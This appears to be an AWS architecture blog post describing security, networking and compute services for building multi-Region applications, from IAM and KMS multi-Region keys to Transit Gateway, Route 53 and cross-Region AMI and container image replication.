Creating a security foundation starts with proper authentication, authorization, and accounting to implement the principle of least privilege. AWS Identity and Access Management (IAM) operates in a global context by default. With IAM, you specify who can access which AWS resources and under what conditions. For workloads that use directory services, the AWS Directory Service for Microsoft Active Directory Enterprise Edition can be set up to automatically replicate directory data across Regions. This allows applications to reduce lookup latencies by using the closest directory and creates durability by spanning multiple Regions.

Applications that need to securely store, rotate, and audit secrets, such as database passwords, should use AWS Secrets Manager. It encrypts secrets with AWS Key Management Service (AWS KMS) keys and can replicate secrets to secondary Regions to ensure applications are able to obtain a secret in the closest Region.

Encrypt everything all the time

AWS KMS can be used to encrypt data at rest, and is used extensively for encryption across AWS services. By default, keys are confined to a single Region. AWS KMS multi-Region keys can be created to replicate keys to a second Region, which eliminates the need to decrypt and re-encrypt data with a different key in each Region.

AWS CloudTrail logs user activity and API usage. Logs are created in each Region, but they can be centralized from multiple Regions and multiple accounts into a single Amazon Simple Storage Service (Amazon S3) bucket. As a best practice, these logs should be aggregated to an account that is only accessible to required security personnel to prevent misuse.

As your application expands to new Regions, AWS Security Hub can aggregate and link findings to a single Region to create a centralized view across accounts and Regions. These findings are continuously synced between Regions to keep you updated on global findings.

We put these features together in Figure 1.

Multi-Region security, identity, and compliance services

Figure 1. Multi-Region security, identity, and compliance services

Building a global network

For resources launched into virtual networks in different Regions, Amazon Virtual Private Cloud (Amazon VPC) allows private routing between Regions and accounts with VPC peering. These resources can communicate using private IP addresses and do not require an internet gateway, VPN, or separate network appliances. This works well for smaller networks that only require a few peering connections. However, as the number of peered connections increases, the mesh of peered connections can become difficult to manage and troubleshoot.

AWS Transit Gateway can help reduce these difficulties by creating a central transitive hub to act as a cloud router. A Transit Gateway’s routing capabilities can expand to additional Regions with Transit Gateway inter-Region peering to create a globally distributed private network.

Building a reliable, cost-effective way to route users to distributed Internet applications requires highly available and scalable Domain Name System (DNS) records. Amazon Route 53 does exactly that.

Route 53 routing policies can route traffic to a record with the lowest latency, or automatically fail over a record. If a larger failure occurs, the Route 53 Application Recovery Controller can simplify the monitoring and failover process for application failures across Regions, AZs, and on-premises.

Amazon CloudFront’s content delivery network is truly global, built across 300+ points of presence (PoP) spread throughout the world. Applications that have multiple possible origins, such as across Regions, can use CloudFront origin failover to automatically fail over the origin. CloudFront’s capabilities expand beyond serving content, with the ability to run compute at the edge. CloudFront functions make it easy to run lightweight JavaScript functions, and AWS Lambda@Edge makes it easy to run Node.js and Python functions across these 300+ PoPs.

AWS Global Accelerator uses the AWS global network infrastructure to provide two static anycast IPs for your application. It automatically routes traffic to the closest Region deployment, and if a failure is detected it will automatically redirect traffic to a healthy endpoint within seconds.

Figure 2 brings these features together to create a global network across two Regions.

AWS VPC connectivity and content delivery

Figure 2. AWS VPC connectivity and content delivery

Building the compute layer

An Amazon Elastic Compute Cloud (Amazon EC2) instance is based on an Amazon Machine Image (AMI). An AMI specifies instance configurations such as the instance’s storage, launch permissions, and device mappings. When a new standard image needs to be created, EC2 Image Builder can be used to streamline copying AMIs to selected Regions.

Although EC2 instances and their associated Amazon Elastic Block Store (Amazon EBS) volumes live in a single AZ, Amazon Data Lifecycle Manager can automate the process of taking and copying EBS snapshots across Regions. This can enhance DR strategies by providing a relatively easy cold backup-and-restore option for EBS volumes.

As an architecture expands into multiple Regions, it can become difficult to track where instances are provisioned. Amazon EC2 Global View helps solve this by providing a centralized dashboard to see Amazon EC2 resources such as instances, VPCs, subnets, security groups, and volumes in all active Regions.

Microservice-based applications that use containers benefit from quicker start-up times. Amazon Elastic Container Registry (Amazon ECR) can help ensure this happens consistently across Regions with private image replication at the registry level. An ECR private registry can be configured for either cross-Region or cross-account replication to ensure your images are ready in secondary Regions when needed.

We bring these compute layer features together in Figure 3.

AMI and EBS snapshot copy across Regions

Figure 3. AMI and EBS snapshot copy across Regions

Summary

It’s important to create a solid foundation when architecting a multi-Region application. These foundations pave the way for you to move fast in a secure, reliable, and elastic way as you build out your application. In this post, we covered options across AWS security, networking, and compute services that have built-in functionality to take away some of the undifferentiated heavy lifting. We’ll cover data, application, and management services in future posts.

Ready to get started? We’ve chosen some AWS Solutions and AWS Blogs to help you!

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!